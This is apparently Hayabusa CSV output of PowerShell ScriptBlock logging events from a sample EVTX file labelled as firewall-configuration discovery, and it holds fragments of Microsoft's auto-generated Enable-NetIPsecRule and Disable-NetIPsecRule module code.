(PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Component', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(Par",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,", ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 